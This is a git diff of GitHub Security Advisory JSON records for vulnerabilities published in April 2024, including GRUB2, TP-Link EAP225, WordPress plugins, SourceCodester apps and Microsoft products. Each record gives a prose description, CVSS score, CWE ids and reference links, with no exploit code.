b/advisories/unreviewed/2024/04/GHSA-975v-wj6r-fgj8/GHSA-975v-wj6r-fgj8.json new file mode 100644 index 00000000000..0fa7391465c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-975v-wj6r-fgj8/GHSA-975v-wj6r-fgj8.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-975v-wj6r-fgj8", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2024-2312" + ], + "details": "GRUB2 does not call the module fini functions on exit, leading to Debian/Ubuntu's peimage GRUB2 module leaving UEFI system table hooks after exit. This lead to a use-after-free condition, and could possibly lead to secure boot bypass.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2312" + }, + { + "type": "WEB", + "url": "https://bugs.launchpad.net/ubuntu/+source/grub2-unsigned/+bug/2054127" + }, + { + "type": "WEB", + "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2312" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-97xg-px2h-jvxp/GHSA-97xg-px2h-jvxp.json b/advisories/unreviewed/2024/04/GHSA-97xg-px2h-jvxp/GHSA-97xg-px2h-jvxp.json index 693107edad6..3235e696bbf 100644 --- a/advisories/unreviewed/2024/04/GHSA-97xg-px2h-jvxp/GHSA-97xg-px2h-jvxp.json +++ b/advisories/unreviewed/2024/04/GHSA-97xg-px2h-jvxp/GHSA-97xg-px2h-jvxp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-97xg-px2h-jvxp", - "modified": "2024-04-03T00:30:56Z", + "modified": "2024-04-06T03:30:26Z", "published": "2024-04-03T00:30:55Z", "aliases": [ "CVE-2024-3209" @@ -25,6 +25,10 @@ "type": "WEB", "url": "https://drive.google.com/drive/folders/1qlUXvycOzGJygfkdQB9dGO6VwNRRZoih?usp=sharing" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZHWZN2NX5W3WYA6ACJ746PAZXXNZETKD" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.259055" diff --git a/advisories/unreviewed/2024/04/GHSA-9954-8wq3-xgxf/GHSA-9954-8wq3-xgxf.json b/advisories/unreviewed/2024/04/GHSA-9954-8wq3-xgxf/GHSA-9954-8wq3-xgxf.json new file mode 100644 index 00000000000..a5b68df01df --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9954-8wq3-xgxf/GHSA-9954-8wq3-xgxf.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9954-8wq3-xgxf", + "modified": "2024-04-09T15:30:37Z", + "published": "2024-04-09T15:30:37Z", + "aliases": [ + "CVE-2023-49908" + ], + "details": "A stack-based buffer overflow vulnerability exists in the web interface Radio Scheduling functionality of Tp-Link AC1350 Wireless MU-MIMO Gigabit Access Point (EAP225 V3) v5.1.0 Build 20220926. A specially crafted series of HTTP requests can lead to remote code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.This vulnerability refers specifically to the overflow that occurs via the `profile` parameter at offset `0x0045abc8` of the `httpd_portal` binary shipped with v5.1.0 Build 20220926 of the EAP225.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49908" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + }, + { + "type": "WEB", + "url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1888" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T15:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9c5h-gfrp-34v7/GHSA-9c5h-gfrp-34v7.json b/advisories/unreviewed/2024/04/GHSA-9c5h-gfrp-34v7/GHSA-9c5h-gfrp-34v7.json new file mode 100644 index 00000000000..09a4b41f7c3 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9c5h-gfrp-34v7/GHSA-9c5h-gfrp-34v7.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9c5h-gfrp-34v7", + "modified": "2024-04-06T09:31:02Z", + "published": "2024-04-06T09:31:02Z", + "aliases": [ + "CVE-2024-2132" + ], + "details": "The Ultimate Bootstrap Elements for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Widget in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2132" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3062338%40ultimate-bootstrap-elements-for-elementor&new=3062338%40ultimate-bootstrap-elements-for-elementor&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0cb43deb-63f6-42d8-8dd6-55a59fca31ae?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T09:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9h5q-wqw4-5xm2/GHSA-9h5q-wqw4-5xm2.json b/advisories/unreviewed/2024/04/GHSA-9h5q-wqw4-5xm2/GHSA-9h5q-wqw4-5xm2.json new file mode 100644 index 00000000000..1f92d2d3f40 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9h5q-wqw4-5xm2/GHSA-9h5q-wqw4-5xm2.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9h5q-wqw4-5xm2", + "modified": "2024-04-07T12:31:03Z", + "published": "2024-04-07T12:31:03Z", + "aliases": [ + "CVE-2024-3419" + ], + "details": "A vulnerability has been found in SourceCodester Online Courseware 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file admin/edit.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259591.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3419" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-04.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259591" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259591" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311597" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T10:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9h9f-x9hq-6x6p/GHSA-9h9f-x9hq-6x6p.json b/advisories/unreviewed/2024/04/GHSA-9h9f-x9hq-6x6p/GHSA-9h9f-x9hq-6x6p.json new file mode 100644 index 00000000000..fbc4de8e871 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9h9f-x9hq-6x6p/GHSA-9h9f-x9hq-6x6p.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9h9f-x9hq-6x6p", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28945" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28945" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28945" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-191" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9j6h-484m-x3f5/GHSA-9j6h-484m-x3f5.json b/advisories/unreviewed/2024/04/GHSA-9j6h-484m-x3f5/GHSA-9j6h-484m-x3f5.json new file mode 100644 index 00000000000..cb62c688f4d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9j6h-484m-x3f5/GHSA-9j6h-484m-x3f5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9j6h-484m-x3f5", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-2730" + ], + "details": "Mautic uses predictable page indices for unpublished landing pages, their content can be accessed by unauthenticated users under public preview URLs which could expose sensitive data. At the time of publication of the CVE no patch is available \n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2730" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/cd3321a4-9ebc-48fa-8d4c-b5720089c2d9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-425" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T14:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9jc6-4356-gcv5/GHSA-9jc6-4356-gcv5.json b/advisories/unreviewed/2024/04/GHSA-9jc6-4356-gcv5/GHSA-9jc6-4356-gcv5.json new file mode 100644 index 00000000000..68f0c0d34f5 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9jc6-4356-gcv5/GHSA-9jc6-4356-gcv5.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9jc6-4356-gcv5", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-2655" + ], + "details": "The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Post widgets in all versions up to, and including, 8.3.5 due to insufficient input sanitization and output escaping on author display names. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2655" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/post-meta/author.php#L8" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/69f2fc37-4c02-48da-b1e8-350ecc8ba086?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T06:15:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9p2q-32cq-fp5c/GHSA-9p2q-32cq-fp5c.json b/advisories/unreviewed/2024/04/GHSA-9p2q-32cq-fp5c/GHSA-9p2q-32cq-fp5c.json new file mode 100644 index 00000000000..f7a17197ec6 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9p2q-32cq-fp5c/GHSA-9p2q-32cq-fp5c.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9p2q-32cq-fp5c", + "modified": "2024-04-06T12:30:56Z", + "published": "2024-04-06T12:30:56Z", + "aliases": [ + "CVE-2024-3365" + ], + "details": "A vulnerability was found in SourceCodester Online Library System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin/users/controller.php. The manipulation of the argument user_name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259469 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3365" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/main/Online-Library-System-07.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259469" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259469" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.310432" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-06T10:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9pw9-3858-mcgc/GHSA-9pw9-3858-mcgc.json b/advisories/unreviewed/2024/04/GHSA-9pw9-3858-mcgc/GHSA-9pw9-3858-mcgc.json new file mode 100644 index 00000000000..8bc59f96480 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9pw9-3858-mcgc/GHSA-9pw9-3858-mcgc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9pw9-3858-mcgc", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-29050" + ], + "details": "Windows Cryptographic Services Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29050" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29050" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-197" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9q4r-mjjh-mj2c/GHSA-9q4r-mjjh-mj2c.json b/advisories/unreviewed/2024/04/GHSA-9q4r-mjjh-mj2c/GHSA-9q4r-mjjh-mj2c.json new file mode 100644 index 00000000000..41c4af36e28 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9q4r-mjjh-mj2c/GHSA-9q4r-mjjh-mj2c.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9q4r-mjjh-mj2c", + "modified": "2024-04-10T15:30:40Z", + "published": "2024-04-10T15:30:40Z", + "aliases": [ + "CVE-2024-26097" + ], + "details": "Adobe Experience Manager versions 6.5.19 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26097" + }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/experience-manager/apsb24-21.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T09:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9qp6-g335-w8ph/GHSA-9qp6-g335-w8ph.json b/advisories/unreviewed/2024/04/GHSA-9qp6-g335-w8ph/GHSA-9qp6-g335-w8ph.json new file mode 100644 index 00000000000..f66b89efb8d --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9qp6-g335-w8ph/GHSA-9qp6-g335-w8ph.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9qp6-g335-w8ph", + "modified": "2024-04-08T15:30:33Z", + "published": "2024-04-08T15:30:33Z", + "aliases": [ + "CVE-2024-31816" + ], + "details": "In TOTOLINK EX200 V4.0.3c.7646_B20201211, an attacker can obtain sensitive information without authorization through the function getEasyWizardCfg.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31816" + }, + { + "type": "WEB", + "url": "https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/EX200/Leak_getEasyWizardCfg/Leak.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T13:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9qx9-xj3x-vh99/GHSA-9qx9-xj3x-vh99.json b/advisories/unreviewed/2024/04/GHSA-9qx9-xj3x-vh99/GHSA-9qx9-xj3x-vh99.json new file mode 100644 index 00000000000..e7b2fed28c0 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9qx9-xj3x-vh99/GHSA-9qx9-xj3x-vh99.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9qx9-xj3x-vh99", + "modified": "2024-04-09T18:30:24Z", + "published": "2024-04-09T18:30:24Z", + "aliases": [ + "CVE-2024-21322" + ], + "details": "Microsoft Defender for IoT Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-21322" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21322" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9r3q-3rc4-46v4/GHSA-9r3q-3rc4-46v4.json b/advisories/unreviewed/2024/04/GHSA-9r3q-3rc4-46v4/GHSA-9r3q-3rc4-46v4.json new file mode 100644 index 00000000000..68b7659e277 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9r3q-3rc4-46v4/GHSA-9r3q-3rc4-46v4.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9r3q-3rc4-46v4", + "modified": "2024-04-10T00:30:29Z", + "published": "2024-04-10T00:30:29Z", + "aliases": [ + "CVE-2024-3523" + ], + "details": "A vulnerability classified as critical was found in Campcodes Online Event Management System 1.0. This vulnerability affects unknown code of the file /views/index.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259894 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3523" + }, + { + "type": "WEB", + "url": "https://github.com/E1CHO/cve_hub/blob/main/Online%20Event%20Management%20System/Online%20Event%20Management%20System%20-%20vuln%202.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259894" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259894" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312505" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T23:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9rh9-6hgf-65f4/GHSA-9rh9-6hgf-65f4.json b/advisories/unreviewed/2024/04/GHSA-9rh9-6hgf-65f4/GHSA-9rh9-6hgf-65f4.json new file mode 100644 index 00000000000..d82916c1683 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9rh9-6hgf-65f4/GHSA-9rh9-6hgf-65f4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9rh9-6hgf-65f4", + "modified": "2024-04-09T18:30:28Z", + "published": "2024-04-09T18:30:28Z", + "aliases": [ + "CVE-2024-29984" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29984" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29984" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-122" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9rx6-wx6f-qfrg/GHSA-9rx6-wx6f-qfrg.json b/advisories/unreviewed/2024/04/GHSA-9rx6-wx6f-qfrg/GHSA-9rx6-wx6f-qfrg.json new file mode 100644 index 00000000000..8cb0f2a1450 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9rx6-wx6f-qfrg/GHSA-9rx6-wx6f-qfrg.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9rx6-wx6f-qfrg", + "modified": "2024-04-07T18:30:30Z", + "published": "2024-04-07T18:30:30Z", + "aliases": [ + "CVE-2024-3428" + ], + "details": "A vulnerability has been found in SourceCodester Online Courseware 1.0 and classified as problematic. This vulnerability affects unknown code of the file edit.php. The manipulation of the argument id leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259600.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3428" + }, + { + "type": "WEB", + "url": "https://github.com/thisissuperann/Vul/blob/Online-Courseware/Online-Courseware-13.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259600" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259600" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311607" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-07T18:15:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9x76-66cx-ppf5/GHSA-9x76-66cx-ppf5.json b/advisories/unreviewed/2024/04/GHSA-9x76-66cx-ppf5/GHSA-9x76-66cx-ppf5.json new file mode 100644 index 00000000000..e3f3e240542 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9x76-66cx-ppf5/GHSA-9x76-66cx-ppf5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9x76-66cx-ppf5", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28939" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28939" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28939" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-209" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-9xr8-gjj4-777r/GHSA-9xr8-gjj4-777r.json b/advisories/unreviewed/2024/04/GHSA-9xr8-gjj4-777r/GHSA-9xr8-gjj4-777r.json new file mode 100644 index 00000000000..d3c5ad93dbe --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-9xr8-gjj4-777r/GHSA-9xr8-gjj4-777r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9xr8-gjj4-777r", + "modified": "2024-04-05T18:30:34Z", + "published": "2024-04-05T18:30:34Z", + "aliases": [ + "CVE-2023-31028" + ], + "details": "\nNVIDIA nvJPEG2000 Library for Windows and Linux contains a vulnerability where improper input validation might enable an attacker to use a specially crafted input file. A successful exploit of this vulnerability might lead to a partial denial of service.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-31028" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5517" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c274-3m34-wwp8/GHSA-c274-3m34-wwp8.json b/advisories/unreviewed/2024/04/GHSA-c274-3m34-wwp8/GHSA-c274-3m34-wwp8.json new file mode 100644 index 00000000000..153339e2ef4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c274-3m34-wwp8/GHSA-c274-3m34-wwp8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c274-3m34-wwp8", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26221" + ], + "details": "Windows DNS Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26221" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26221" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c27x-344g-xx8m/GHSA-c27x-344g-xx8m.json b/advisories/unreviewed/2024/04/GHSA-c27x-344g-xx8m/GHSA-c27x-344g-xx8m.json new file mode 100644 index 00000000000..fb29f1e45c2 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-c27x-344g-xx8m/GHSA-c27x-344g-xx8m.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c27x-344g-xx8m", + "modified": "2024-04-05T21:32:43Z", + "published": "2024-04-05T21:32:43Z", + "aliases": [ + "CVE-2024-29742" + ], + "details": "In apply_minlock_constraint of dvfs.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29742" + }, + { + "type": "WEB", + "url": "https://source.android.com/security/bulletin/pixel/2024-04-01" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T20:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-c2p9-p97g-7246/GHSA-c2p9-p97g-7246.json 